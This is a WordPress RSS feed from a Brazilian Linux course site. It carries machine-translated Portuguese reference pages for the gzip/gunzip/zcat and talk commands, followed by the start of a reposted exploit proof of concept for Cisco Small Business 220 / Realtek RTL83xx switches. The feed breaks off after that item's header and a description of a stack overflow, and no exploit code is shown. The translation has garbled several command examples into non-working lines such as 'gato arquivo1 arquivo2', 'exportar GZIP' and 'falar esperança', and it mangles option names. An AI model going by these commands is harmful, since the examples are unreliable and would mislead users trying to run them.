<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Sem categoria &#8211; Linux Force Security</title>
	<atom:link href="https://linuxforce.com.br/category/sem-categoria/feed/" rel="self" type="application/rss+xml" />
	<link>https://linuxforce.com.br</link>
	<description>Aprenda Linux do básico ao avançado com instrutores especialistas. Cursos ao vivo de Linux, Segurança da Informação, Devops e preparação para a certificação LPI.</description>
	<lastBuildDate>Mon, 25 Nov 2019 16:43:20 +0000</lastBuildDate>
	<language>pt-BR</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.1</generator>

<image>
	<url>https://linuxforce.com.br/wp-content/uploads/2025/02/favicon-linux-force-security.png</url>
	<title>Sem categoria &#8211; Linux Force Security</title>
	<link>https://linuxforce.com.br</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Comandos Linux – Comando gzip</title>
		<link>https://linuxforce.com.br/sem-categoria/comandos-linux-comando-talk-2/</link>
		
		<dc:creator><![CDATA[Marcio Mariano]]></dc:creator>
		<pubDate>Mon, 25 Nov 2019 16:43:20 +0000</pubDate>
				<category><![CDATA[Sem categoria]]></category>
		<guid isPermaLink="false">https://www.linuxforce.com.br/?p=3909</guid>

					<description><![CDATA[Comandos Linux gzip, gunzip e zcat Em sistemas operacionais do tipo Unix, o comando gzip cria, lista, modifica e extrai dados dos arquivos GZIP . O comando gunzip extrai dados dos arquivos GZIP. O comando zcat imprime o conteúdo dos arquivos GZIP. Descrição Sintaxe Exemplos Comandos relacionados Descrição Gzip reduz o tamanho dos arquivos nomeados usando a codificação Lempel &#8211; Ziv (LZ77). Sempre que possível, cada arquivo é substituído por um com a extensão .gz , [&#8230;]]]></description>
										<content:encoded><![CDATA[<h1><span class="notranslate">Comandos Linux gzip, gunzip e zcat</span></h1>
<div class="updated"></div>
<p><img fetchpriority="high" decoding="async" class="floatRight" src="https://www.computerhope.com/cdn/linux/gzip.gif" alt="comando gzip" width="300" height="300" /></p>
<p class="intro"><span class="notranslate">Em sistemas operacionais do tipo Unix, o comando <b>gzip</b> cria, lista, modifica e extrai dados dos arquivos GZIP .</span></p>
<p><span class="notranslate">O comando <b>gunzip</b> extrai dados dos arquivos GZIP.</span></p>
<p><span class="notranslate">O comando <b>zcat</b> imprime o conteúdo dos arquivos GZIP.</span></p>
<div class="pagenav contents">
<ul>
<li style="list-style-type: none;">
<ul>
<li><span class="notranslate"><a href="#Descrição">Descrição</a></span></li>
<li><span class="notranslate"><a href="#Sintaxe">Sintaxe</a></span></li>
<li><span class="notranslate"><a href="#Exemplos">Exemplos</a></span></li>
<li><span class="notranslate"><a href="#Comandos relacionados">Comandos relacionados</a></span></li>
</ul>
</li>
</ul>
</div>
<h2 id="desc"><span class="notranslate">Descrição</span></h2>
<p class="tab"><span class="notranslate">Gzip reduz o tamanho dos arquivos nomeados usando a codificação Lempel &#8211; Ziv (LZ77).</span> <span class="notranslate">Sempre que possível, cada arquivo é substituído por um com a extensão <b>.gz</b> , mantendo os mesmos modos de propriedade , acesso e tempos de modificação.</span> <span class="notranslate">(A extensão padrão é <b>-gz</b> para VMS , <b>z</b> para MSDOS , OS / 2 FAT , Windows NT FAT e Atari .) Se nenhum arquivo for especificado ou se o nome de um arquivo for &#8221; <b>&#8211;</b> &#8220;, a entrada padrão será compactada para o padrão saída .</span> <span class="notranslate"><b>O gzip</b> tentará apenas compactar arquivos regulares.</span> <span class="notranslate">Em particular, ele ignora links simbólicos .</span></p>
<p class="tab"><span class="notranslate">Se o nome do arquivo compactado for muito longo para o sistema de arquivos , o <b>gzip o</b> truncará .</span> <span class="notranslate"><b>O gzip</b> tenta truncar apenas as partes do nome do arquivo com mais de 3 caracteres .</span> <span class="notranslate">(Uma parte é delimitada por pontos.) Se o nome consistir apenas em partes pequenas, as partes mais longas serão truncadas.</span> <span class="notranslate">Por exemplo, se os nomes de arquivo estiverem limitados a 14 caracteres, o <b>gzip.msdos.exe</b> será compactado para <b>gzi.msd.exe.gz.</b></span> <span class="notranslate">Os nomes não são truncados em sistemas que não têm um limite no tamanho do nome do arquivo.</span></p>
<p class="tab"><span class="notranslate">Por padrão, o <b>gzip</b> mantém o nome do arquivo original e o carimbo de data e hora no arquivo compactado.</span> <span class="notranslate">Eles são usados ​​ao descompactar o arquivo com a opção <b>-N</b> .</span> <span class="notranslate">Isso é útil quando o nome do arquivo compactado foi truncado ou quando o registro de data e hora não foi preservado após a transferência do arquivo .</span></p>
<p class="tab"><span class="notranslate">Os arquivos compactados podem ser restaurados para sua forma original usando <b>gzip -d</b> ou <b>gunzip</b> ou <b>zcat</b> .</span> <span class="notranslate">Se o nome original salvo no arquivo compactado não for adequado para seu sistema de arquivos, um novo nome será construído a partir do original para torná-lo legal.</span></p>
<p class="tab"><span class="notranslate"><b>gunzip</b> pega uma lista de arquivos em sua linha de comando e substitui cada arquivo cujo nome termina com <b>.gz</b> , <b>-gz</b> , <b>.z</b> , <b>-z</b> ou <b>_z</b> ( caso de ignorância) e que começa com o número mágico correto com um arquivo descompactado sem a opção extensão original.</span> <span class="notranslate"><b>O gunzip</b> também reconhece as extensões especiais <b>.tgz</b> e <b>.taz</b> como atalhos para <b>.tar.gz</b> e <b>.tar.Z,</b> respectivamente.</span> <span class="notranslate">Ao compactar, o <b>gzip</b> usa a extensão <b>.tgz,</b> se necessário, em vez de truncar um arquivo com uma extensão <b>.tar</b> .</span></p>
<p class="tab"><span class="notranslate">Atualmente, o <b>gunzip</b> pode descomprimir arquivos criados por gzip , zip , compactar , <b>compactar -H</b> ou pacote .</span> <span class="notranslate">A detecção do formato de entrada é automática.</span> <span class="notranslate">Ao usar os dois primeiros formatos, o <b>gunzip</b> verifica um CRC de 32 bits .</span> <span class="notranslate">No <b>pacote</b> , o <b>gunzip</b> verifica o comprimento não compactado.</span> <span class="notranslate">O formato de compactação padrão não foi projetado para permitir verificações de consistência.</span> <span class="notranslate">No entanto, o gunzip às vezes é capaz de detectar um arquivo <b>.Z</b> ruim.</span> <span class="notranslate">Se você receber um erro ao descompactar um arquivo <b>.Z</b> , não presuma que o arquivo <b>.Z</b> esteja correto porque a descompactação padrão não se queixa.</span> <span class="notranslate">Isso geralmente significa que a <b>descompactação</b> padrão não verifica sua entrada e gera felizmente a saída de lixo.</span> <span class="notranslate">O formato <b>SCH</b> <b>compress -H</b> (método de compressão <b>lzh</b> ) não inclui um CRC, mas também permite algumas verificações de consistência.</span></p>
<p class="tab"><span class="notranslate">Os arquivos criados por zip podem ser descompactados pelo <b>gzip</b> apenas se eles tiverem um único membro compactado com o método &#8216;deflation&#8217;.</span> <span class="notranslate">Este recurso destina-se apenas a ajudar na conversão de arquivos <b>tar.zip</b> para o formato <b>tar.gz.</b></span> <span class="notranslate">Para extrair um arquivo zip com um único membro, use um comando como <b>gunzip &lt;foo.zip</b> ou <b>gunzip -S .zip foo.zip</b> .</span> <span class="notranslate">Para extrair arquivos zip com vários membros, use descompactar em vez de <b>gunzip</b> .</span></p>
<p class="tab"><span class="notranslate"><b>O zcat</b> é idêntico ao <b>gunzip -c</b> .</span> <span class="notranslate">(Em alguns sistemas, o <b>zcat</b> pode ser instalado como <b>gzcat</b> para preservar o link original para <b>compactar</b> .) O <b>zcat</b> descompacta uma lista de arquivos na linha de comandos ou em sua entrada padrão e grava os dados não compactados na saída padrão.</span> <span class="notranslate"><b>O zcat</b> descompactará arquivos com o número mágico correto, independentemente de terem ou não um sufixo <b>.gz</b> .</span></p>
<p class="tab"><span class="notranslate"><b>O gzip</b> usa o algoritmo Lempel-Ziv usado no <b>zip</b> e no PKZIP .</span> <span class="notranslate">A quantidade de compressão obtida depende do tamanho da entrada e da distribuição de substrings comuns.</span> <span class="notranslate">Normalmente, textos como código fonte ou inglês são reduzidos de 60 a 70%.</span> <span class="notranslate">A compactação geralmente é muito melhor do que a alcançada pelo <b>LZW</b> (como usado na <b>compressa</b> ), pela codificação Huffman (como usada na <b>embalagem</b> ) ou pela codificação adaptativa Huffman ( compacta ).</span></p>
<p class="tab"><span class="notranslate">A compactação é sempre realizada, mesmo se o arquivo compactado for um pouco maior que o original.</span> <span class="notranslate">O pior caso de expansão é de alguns bytes para o cabeçalho do arquivo <b>gzip</b> , mais 5 bytes a cada bloco de 32 K ou uma taxa de expansão de 0,015% para arquivos grandes.</span> <span class="notranslate">Observe que o número real de blocos de disco usados ​​quase nunca aumenta e o gzip preserva o modo, a propriedade e os carimbos de data e hora dos arquivos ao compactar ou descompactar.</span></p>
<p class="tab"><span class="notranslate">O formato de arquivo <b>gzip</b> é especificado em <i>P. Deutsch, versão 4.3 da especificação de formato de arquivo GZIP</i> , https://www.ietf.org/rfc/rfc1952.txt , Internet RFC 1952 (maio de 1996 ).</span> <span class="notranslate">O formato de deflação do zip está especificado em <i>P. Deutsch, DEFLATE Compressed Data Format Specification versão 1.3</i> , https://www.ietf.org/rfc/rfc1951.txt , Internet RFC 1951 (maio de 1996).</span></p>
<h2 id="syntax"><span class="notranslate">Sintaxe</span></h2>
<pre class="tcy tab"> <span class="notranslate"> gzip [-acdfhlLnNrtvV19] [ <i>sufixo</i> -S] [ <i>nome</i> ...]</span></pre>
<pre class="tcy tab"> <span class="notranslate"> gunzip [-acfhlLnNrtvV] [-S sufixo] [ <i>nome</i> ...]</span></pre>
<pre class="tcy tab"> <span class="notranslate"> zcat [-fhLV] [nome ...]</span></pre>
<h2><span class="notranslate">Opções</span></h2>
<table class="mtable3 tab">
<tbody>
<tr class="tcw">
<td><span class="notranslate"><b>-a &#8211;ascii</b></span></td>
<td><span class="notranslate">Modo de texto ascii : converta o fim de linhas usando convenções locais.</span> <span class="notranslate">Esta opção é suportada apenas em alguns sistemas não Unix.</span> <span class="notranslate">Para MSDOS, o CR LF é convertido em LF ao compactar, e LF é convertido em CR LF ao descompactar.</span></td>
</tr>
<tr class="tcw">
<td><span class="notranslate"><b>-c &#8211;stdout &#8211;to-stdout</b></span></td>
<td><span class="notranslate">Grava a saída na saída padrão;</span> <span class="notranslate">mantenha os arquivos originais inalterados.</span> <span class="notranslate">Se houver vários arquivos de entrada, a saída consistirá em uma sequência de membros compactados independentemente.</span> <span class="notranslate">Para obter uma melhor compactação, concatene todos os arquivos de entrada antes de compactá-los.</span></td>
</tr>
<tr class="tcw">
<td><span class="notranslate"><b>-d &#8211;dcompress &#8211;uncompress</b></span></td>
<td><span class="notranslate">Descomprimir.</span></td>
</tr>
<tr class="tcw">
<td><span class="notranslate"><b>-f &#8211;force</b></span></td>
<td><span class="notranslate">Força a compactação ou descompactação, mesmo se o arquivo tiver vários links ou o arquivo correspondente já existir, ou se os dados compactados forem lidos ou gravados em um terminal .</span> <span class="notranslate">Se os dados de entrada não estiverem em um formato reconhecido pelo <b>gzip</b> , e se a opção <b>&#8211;stdout</b> também for fornecida, copie os dados de entrada sem alterar a saída padrão: deixe o <b>zcat</b> se comportar como gato .</span> <span class="notranslate">Se <b>-f</b> não for fornecido, e quando não estiver em execução em segundo plano, o <b>gzip</b> solicitará que verifique se um arquivo existente deve ser substituído .</span></td>
</tr>
<tr class="tcw">
<td><span class="notranslate"><b>-h &#8211;help</b></span></td>
<td><span class="notranslate">Exiba uma tela de ajuda e saia.</span></td>
</tr>
<tr class="tcw">
<td><span class="notranslate"><b>-l &#8211;list</b></span></td>
<td><span class="notranslate">Para cada arquivo compactado, liste os seguintes campos:</span></p>
<p><span class="notranslate"><b>tamanho compactado:</b> tamanho do arquivo compactado;</span></p>
<p><span class="notranslate"><b>tamanho descompactado:</b> tamanho do arquivo descompactado;</span></p>
<p><span class="notranslate"><b>razão: taxa de</b> compressão (0,0% se desconhecido);</span></p>
<p><span class="notranslate">nome <b>não compactado:</b> nome do arquivo não compactado.</span></p>
<p><span class="notranslate">O tamanho não compactado é fornecido como <b>-1</b> para arquivos que não estão no formato <b>gzip</b> , como arquivos <b>.Z</b> compactados.</span> <span class="notranslate">Para obter o tamanho descompactado para esse arquivo, você pode usar:</span></p>
<p><span class="notranslate"><b>arquivo zcat.Z |</b></span> <span class="notranslate"><b>wc -c</b></span></p>
<p><span class="notranslate">Em combinação com a opção <b>&#8211;verbose</b> , os seguintes campos também são exibidos:</span></p>
<p><span class="notranslate"><b>método: método de</b> compressão;</span></p>
<p><span class="notranslate"><b>crc:</b> o CRC de 32 bits dos dados não compactados;</span></p>
<p><span class="notranslate"><b>data e hora:</b> registro de <b>data e hora</b> para o arquivo descompactado.</span></p>
<p><span class="notranslate">Os métodos de compactação atualmente suportados são <b>deflate</b> , <b>compress</b> , <b>lzh</b> ( SCO <b>compress -H</b> ) e <b>pack</b> .</span> <span class="notranslate">O crc é fornecido como <b>ffffffff</b> para um arquivo que não está no formato gzip.</span></p>
<p><span class="notranslate">Com <b>&#8211;name</b> , o <b>nome</b> descompactado, a <b>data</b> e a <b>hora</b> são aqueles armazenados no arquivo compactado, se presente.</span></p>
<p><span class="notranslate">Com <b>&#8211;verbose</b> , o total de tamanhos e a taxa de compactação de todos os arquivos também são exibidos, a menos que alguns tamanhos sejam desconhecidos.</span> <span class="notranslate">Com <b>&#8211;quiet</b> , o título e as linhas de totais não são exibidos.</span></td>
</tr>
<tr class="tcw">
<td><span class="notranslate"><b>-L &#8211;license</b></span></td>
<td><span class="notranslate">Exiba a licença gzip e saia.</span></td>
</tr>
<tr class="tcw">
<td><span class="notranslate"><b>-n &#8211; sem nome</b></span></td>
<td><span class="notranslate">Ao compactar, não salve o nome do arquivo original e o carimbo de data / hora por padrão.</span> <span class="notranslate">(O nome original é sempre salvo se o nome tiver que ser truncado .) Ao descompactar, não restaure o nome do arquivo original se presente (remova apenas o sufixo gzip do nome do arquivo compactado) e não restaure o carimbo de data / hora original, se presente (copie-o do arquivo compactado).</span> <span class="notranslate">Esta opção é o padrão ao descompactar.</span></td>
</tr>
<tr class="tcw">
<td><span class="notranslate"><b>-N &#8211;name</b></span></td>
<td><span class="notranslate">Ao compactar, sempre salve o nome do arquivo original e a data e hora;</span> <span class="notranslate">esse é o padrão.</span> <span class="notranslate">Ao descompactar, restaure o nome do arquivo original e o carimbo de hora, se houver.</span> <span class="notranslate">Essa opção é útil em sistemas que têm um limite no tamanho do nome do arquivo ou quando o registro de data e hora foi perdido após a transferência do arquivo.</span></td>
</tr>
<tr class="tcw">
<td><span class="notranslate"><b>-q &#8211;quiet</b></span></td>
<td><span class="notranslate">Suprima todos os avisos.</span></td>
</tr>
<tr class="tcw">
<td><span class="notranslate"><b>-r &#8211;recursivo</b></span></td>
<td><span class="notranslate">Viaje pela estrutura de diretórios recursivamente .</span> <span class="notranslate">Se qualquer um dos nomes de arquivo especificados na linha de comando forem diretórios, o <b>gzip</b> descerá para o diretório e compactará todos os arquivos que encontrar lá (ou descompactá-los no caso do <b>gunzip</b> ).</span></td>
</tr>
<tr class="tcw">
<td><span class="notranslate"><b>-S</b> <i>.suf</i> <b>&#8211;suffix</b> <i>.suf</i></span></td>
<td><span class="notranslate">Ao compactar, use o sufixo <i>.suf em</i> vez de <b>.gz</b> .</span> <span class="notranslate">Qualquer sufixo não vazio pode ser fornecido, mas sufixos diferentes de <b>.z</b> e <b>.gz</b> devem ser evitados para evitar confusão quando os arquivos são transferidos para outros sistemas.</span> <span class="notranslate">Ao descompactar, inclua <b>.suf</b> no início da lista de sufixos a tentar, ao derivar um nome de arquivo de saída de um nome de arquivo de entrada.</span></td>
</tr>
<tr class="tcw">
<td><span class="notranslate"><b>-t &#8211;test</b></span></td>
<td><span class="notranslate">Teste.</span> <span class="notranslate">Verifique a integridade do arquivo compactado.</span></td>
</tr>
<tr class="tcw">
<td><span class="notranslate"><b>-v &#8211;verbose</b></span></td>
<td><span class="notranslate">Verbose.</span> <span class="notranslate">Exibe o nome e a porcentagem de redução para cada arquivo compactado ou descompactado.</span></td>
</tr>
<tr class="tcw">
<td><span class="notranslate"><b>-V &#8211;version</b></span></td>
<td><span class="notranslate">Versão.</span> <span class="notranslate">Exiba o número da versão e as opções de compilação e saia.</span></td>
</tr>
<tr class="tcw">
<td><span class="notranslate"><b>&#8211; # &#8211;fast &#8211;melhor</b></span></td>
<td><span class="notranslate">Regule a velocidade da compactação usando o dígito especificado <b>#</b> , onde (por exemplo) <b>-1</b> ou <b>&#8211;fast</b> indica o método de compactação mais rápido (menos compactação) e <b>-9</b> ou <b>&#8211;best</b> indica o método de compactação mais lento (melhor compactação).</span> <span class="notranslate">O nível de compactação padrão é <b>-6</b> (ou seja, inclinado para alta compactação em detrimento da velocidade).</span></td>
</tr>
</tbody>
</table>
<h2 id="advanced"><span class="notranslate">Uso Avançado</span></h2>
<p class="tab"><span class="notranslate">Vários arquivos compactados podem ser concatenados.</span> <span class="notranslate">Nesse caso, o <b>gunzip</b> extrairá todos os membros de uma só vez.</span> <span class="notranslate">Por exemplo:</span></p>
<pre class="tab tcy"> <span class="notranslate"> gzip -c arquivo1&gt; foo.gz</span></pre>
<pre class="tab tcy"> <span class="notranslate"> gzip -c arquivo2 &gt;&gt; foo.gz</span></pre>
<p class="tab"><span class="notranslate">&#8230;então,</span></p>
<pre class="tab tcy"> <span class="notranslate"> gunzip -c foo</span></pre>
<p class="tab"><span class="notranslate">&#8230;é equivalente a:</span></p>
<pre class="tab tcy"> <span class="notranslate"> cat file1 file2</span></pre>
<p class="tab"><span class="notranslate">Em caso de danos a um membro de um arquivo <b>.gz</b> , outros membros ainda poderão ser recuperados (se o membro danificado for removido).</span> <span class="notranslate">No entanto, você pode obter uma melhor compactação compactando todos os membros de uma vez, por exemplo:</span></p>
<pre class="tab tcy"> <span class="notranslate"> gato arquivo1 arquivo2 |</span> <span class="notranslate"> gzip&gt; foo.gz</span></pre>
<p class="tab"><span class="notranslate">&#8230; que comprime melhor que:</span></p>
<pre class="tab tcy"> <span class="notranslate"> gzip -c arquivo1 arquivo2&gt; foo.gz</span></pre>
<p class="tab"><span class="notranslate">Se você deseja recompactar arquivos concatenados para obter uma melhor compactação, faça:</span></p>
<pre class="tab tcy"> <span class="notranslate"> gzip -cd old.gz |</span> <span class="notranslate"> gzip&gt; new.gz</span></pre>
<p class="tab"><span class="notranslate">Se um arquivo compactado consistir em vários membros, o tamanho descompactado e o CRC relatado pela opção <b>&#8211;list</b> se <b>aplicarão</b> apenas ao último membro.</span> <span class="notranslate">Se você precisar do tamanho descompactado para todos os membros, poderá usar:</span></p>
<pre class="tab tcy"> <span class="notranslate"> gzip -cd file.gz |</span> <span class="notranslate"> wc -c</span></pre>
<p class="tab"><span class="notranslate">Se você deseja criar um único arquivo morto com vários membros para que os membros possam ser extraídos posteriormente independentemente, use um arquivador como tar ou <b>zip</b> .</span> <span class="notranslate">O GNU <b>tar</b> suporta a opção <b>-z</b> para chamar o <b>gzip de forma</b> transparente.</span> <span class="notranslate"><b>O gzip</b> foi desenvolvido como um complemento ao <b>tar</b> , não como um substituto.</span></p>
<h2><span class="notranslate">Meio Ambiente</span></h2>
<p class="tab"><span class="notranslate">A variável de ambiente <b>GZIP</b> pode conter um conjunto de opções padrão para o gzip.</span> <span class="notranslate">Essas opções são interpretadas primeiro e podem ser substituídas por parâmetros explícitos da linha de comando.</span> <span class="notranslate">Por exemplo, para sh :</span></p>
<pre class="tab tcy"> <span class="notranslate"> GZIP = "- 8v --name";</span> <span class="notranslate"> exportar GZIP</span></pre>
<p class="tab"><span class="notranslate">para <b>csh</b> :</span></p>
<pre class="tab tcy"> <span class="notranslate"> setenv GZIP "-8v --name"</span></pre>
<p class="tab"><span class="notranslate">para MSDOS:</span></p>
<pre class="tab tcy"> <span class="notranslate"> defina GZIP = -8v --name</span></pre>
<p class="tab"><span class="notranslate">No Vax / VMS , o nome da variável de ambiente é <b>GZIP_OPT</b> , para evitar um conflito com o conjunto de símbolos para a chamada do programa.</span></p>
<h2 id="examples"><span class="notranslate">Exemplos</span></h2>
<p class="tab"><span class="notranslate">Compressão:</span></p>
<pre class="tab tcy"> <span class="notranslate"> gzip file.txt</span></pre>
<p class="tab"><span class="notranslate">No exemplo acima, o comando compactaria o arquivo <b>file.txt</b> como <b>file.txt.gz</b> no diretório atual.</span></p>
<p class="tab"><span class="notranslate">Expansão:</span></p>
<pre class="tab tcy"> <span class="notranslate"> gunzip file.txt.gz</span></pre>
<p class="tab"><span class="notranslate">No exemplo acima, o comando <b>extrairia</b> o <b>arquivo.txt</b> de <b>file.txt.gz.</b></span></p>
<div class="tip tab">
<p><span class="notranslate"><span class="title">Gorjeta</span></span><span class="notranslate">Você também pode usar o comando <b>descompactar</b> se precisar extrair o conteúdo de um arquivo compactado em <b>zip</b> .</span></p>
</div>
<div class="tip">
<p><span class="notranslate"><span class="title">Nota</span></span><span class="notranslate">se você estiver lidando com um tarball (extensão .tar.gz), use o comando tar para extrair arquivos.</span></p>
</div>
<p class="tab tcy"><span class="notranslate">tar -zxvf myfile.tar.gz</span></p>
<p class="tab"><span class="notranslate">No exemplo acima, isso extrairia o conteúdo do myfile.tar.gz no diretório atual.</span></p>
<div class="tip">
<p><span class="notranslate"><span class="title">Gorjeta</span></span><span class="notranslate">Consulte o uso avançado acima para obter mais exemplos.</span></p>
</div>
<h2 id="related"><span class="notranslate">Comandos relacionados</span></h2>
<p class="tab"><span class="notranslate"><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-compress/"><b>compactar</b></a> &#8211; Comprime um arquivo ou arquivos.</span><br />
<span class="notranslate"><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-pack/"><b>pacote</b></a> &#8211; Compactar arquivos usando um algoritmo de Huffman.</span><br />
<span class="notranslate"><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-tar/"><b>tar</b></a> &#8211; Crie, modifique, liste o conteúdo e extraia arquivos de arquivos tar.</span><br />
<span class="notranslate"><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-unpack/"><b>descompacte</b></a> &#8211; <b>liste</b> , teste e extraia arquivos compactados em um arquivo zip.</span><br />
<span class="notranslate"><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-zcat/"><b>zcat</b></a> &#8211; Imprima o conteúdo não compactado dos arquivos compactados</span></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Comandos Linux &#8211; Comando Talk</title>
		<link>https://linuxforce.com.br/sem-categoria/comandos-linux-comando-talk/</link>
		
		<dc:creator><![CDATA[Marcio Mariano]]></dc:creator>
		<pubDate>Mon, 25 Nov 2019 16:39:28 +0000</pubDate>
				<category><![CDATA[Sem categoria]]></category>
		<guid isPermaLink="false">https://www.linuxforce.com.br/?p=3907</guid>

					<description><![CDATA[Comando de conversa do Linux Em sistemas operacionais do tipo Unix, o comando talk fornece uma interface de bate-papo por texto que permite a comunicação em tempo real com outros usuários conectados. Descrição Sintaxe Exemplos Comandos relacionados Descrição O Talk é um programa de comunicação visual que copia linhas do seu terminal para as de outro usuário, como um serviço de mensagens instantâneas . Quando [&#8230;]]]></description>
										<content:encoded><![CDATA[<h1><span class="notranslate">Comando de conversa do Linux</span></h1>
<div class="updated"></div>
<h1><img decoding="async" class="floatRight" src="https://www.computerhope.com/cdn/linux/talk.gif" alt="comando talk" width="300" height="300" /></h1>
<p class="intro"><span class="notranslate">Em sistemas operacionais do tipo Unix, o comando <b>talk</b> fornece uma interface de bate-papo por texto que permite a comunicação em tempo real com outros usuários conectados.</span></p>
<div class="pagenav contents">
<ul>
<li><span class="notranslate"><a href="#Descrição">Descrição</a></span></li>
<li><span class="notranslate"><a href="#Sintaxe">Sintaxe</a></span></li>
<li><span class="notranslate"><a href="#Exemplos">Exemplos</a></span></li>
<li><span class="notranslate"><a href="#Comandos relacionados">Comandos relacionados</a></span></li>
</ul>
</div>
<h2 id="desc"><span class="notranslate">Descrição</span></h2>
<p class="tab"><span class="notranslate"><b>O Talk</b> é um programa de comunicação visual que copia linhas do seu terminal para as de outro usuário, como um serviço de mensagens instantâneas .</span> <span class="notranslate">Quando chamado pela primeira vez, o <b>talk</b> entra em contato com o daemon do <b>talk</b> na máquina do outro usuário, que envia a mensagem abaixo.</span></p>
<pre class="tab"> <span class="notranslate"> Mensagem de TalkDaemon@his machine TalkDaemon@his _machine ...</span>
<span class="notranslate"> talk: conexão solicitada pelo your_name@your _machine.</span>
<span class="notranslate"> conversa: responder com: conversa your_name@your _machine</span></pre>
<p class="tab"><span class="notranslate">para esse usuário.</span> <span class="notranslate">Nesse momento, ele responde digitando</span></p>
<pre class="tab tcy"> <span class="notranslate"> talk your_name@your _machine</span></pre>
<p class="tab"><span class="notranslate">Não importa de qual máquina o destinatário responde, desde que o nome de login seja o mesmo.</span> <span class="notranslate">Uma vez estabelecida a comunicação, as duas partes podem digitar simultaneamente;</span> <span class="notranslate">sua saída aparecerá em janelas separadas.</span> <span class="notranslate">Digitar <b>control-L</b> ( <b>^ L</b> ) fará com que a tela seja impressa novamente.</span> <span class="notranslate">Os caracteres de <b>apagar</b> , <b>eliminar linha</b> e <b>apagar palavras</b> (normalmente <b>^ H</b> , <b>^ U</b> e <b>^ W</b> , respectivamente) se comportarão normalmente.</span> <span class="notranslate">Para sair, basta digitar o caractere de interrupção (normalmente <b>^ C</b> );</span> <span class="notranslate"><b>o talk</b> move o cursor para a parte inferior da tela e restaura o terminal ao estado anterior.</span></p>
<p class="tab"><span class="notranslate"><b>talk</b> suporta scrollback;</span> <span class="notranslate">use <b>esc-p</b> e <b>esc-n</b> para rolar a janela e <b>ctrl-p</b> e <b>ctrl-n</b> para rolar a outra janela.</span></p>
<p class="tab"><span class="notranslate">Se você não deseja receber solicitações de conversa, pode bloqueá-las usando o comando mesg .</span> <span class="notranslate">Por padrão, as solicitações de <b>conversa</b> normalmente não são bloqueadas.</span> <span class="notranslate">Certos comandos, em particular nroff , pine e pr , podem bloquear temporariamente as mensagens para preservar sua própria saída.</span></p>
<h2 id="syntax"><span class="notranslate">Sintaxe</span></h2>
<pre class="tcy tab"> <span class="notranslate"> <i>pessoa de</i> conversa [ <i>ttyname</i> ]</span></pre>
<h2><span class="notranslate">Opções</span></h2>
<table class="mtable3 tab">
<tbody>
<tr class="tcw">
<td><span class="notranslate"><i>pessoa</i></span></td>
<td><span class="notranslate">Se você deseja <b>conversar</b> com alguém em sua máquina, <b>pessoa</b> é apenas o nome de login da pessoa.</span> <span class="notranslate">Se você deseja conversar com um usuário em outro host , a <b>pessoa</b> tem o formato <b>&#8216; user@host &#8216;</b> .</span></td>
</tr>
<tr class="tcw">
<td><span class="notranslate"><i>ttyname</i></span></td>
<td><span class="notranslate">Se você deseja conversar com um usuário que está conectado mais de uma vez, o argumento <b>ttyname</b> pode ser usado para indicar o nome do terminal apropriado, em que ttyname tem o formato &#8216;ttyXX&#8217; ou &#8216;pts / X&#8217;.</span></td>
</tr>
</tbody>
</table>
<h2 id="examples"><span class="notranslate">Exemplos</span></h2>
<pre class="tcy tab"> <span class="notranslate"> falar esperança</span></pre>
<p class="tab"><span class="notranslate">Fale com a <b>esperança do</b> usuário.</span></p>
<h2 id="related"><span class="notranslate">Comandos relacionados</span></h2>
<p class="tab"><span class="notranslate"><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-mesg/"><b>mesg</b></a> &#8211; Controle se usuários (não-root) podem enviar mensagens para o seu terminal.</span><br />
<span class="notranslate"><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-wall/"><b>wall</b></a> &#8211; Envie uma mensagem para todos os usuários conectados.</span><br />
<span class="notranslate"><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-who/"><b>who</b></a> &#8211; Relata quais usuários estão conectados ao sistema.</span><br />
<span class="notranslate"><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-write/"><b>escrever</b></a> &#8211; Envie uma mensagem para outro usuário.</span></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Cisco Small Business 220 Series &#8211; Multiple Vulnerabilities</title>
		<link>https://linuxforce.com.br/sem-categoria/cisco-small-business-220-series-multiple-vulnerabilities/</link>
		
		<dc:creator><![CDATA[Marcio Mariano]]></dc:creator>
		<pubDate>Thu, 31 Oct 2019 18:12:52 +0000</pubDate>
				<category><![CDATA[Sem categoria]]></category>
		<guid isPermaLink="false">https://www.linuxforce.com.br/?p=2937</guid>

					<description><![CDATA[Cisco Small Business 220 Series &#8211; Multiple Vulnerabilities #!/usr/bin/python2.7 # """ [Subject] Realtek Managed Switch Controller (RTL83xx) PoC (2019 bashis) https://www.realtek.com/en/products/communications-network-ics/category/managed-switch-controller [Brief description] 1. Boa/Hydra suffer of exploitable stack overflow with a 'one byte read-write loop' w/o boundary check. (all FW version and vendors affected) Note: The vulnerability are _not_ from Boa nor Hydra, coming [&#8230;]]]></description>
										<content:encoded><![CDATA[<h1 class="card-title text-secondary text-center">Cisco Small Business 220 Series &#8211; Multiple Vulnerabilities</h1>
<div class="wrapper">
<div class="main-panel ps-container ps-theme-default ps-active-y" data-ps-id="dd13f15b-1faa-eee8-11f8-6ab614585dcf">
<div class="content">
<div class="row">
<div class="col-md-12">
<div class="card">
<div class="card-body">
<div class="code-toolbar">
<pre class=" language-py"><code class=" language-py"><span class="token comment">#!/usr/bin/python2.7</span>
<span class="token comment">#</span>
<span class="token triple-quoted-string string">"""

[Subject]

Realtek Managed Switch Controller (RTL83xx) PoC (2019 bashis)
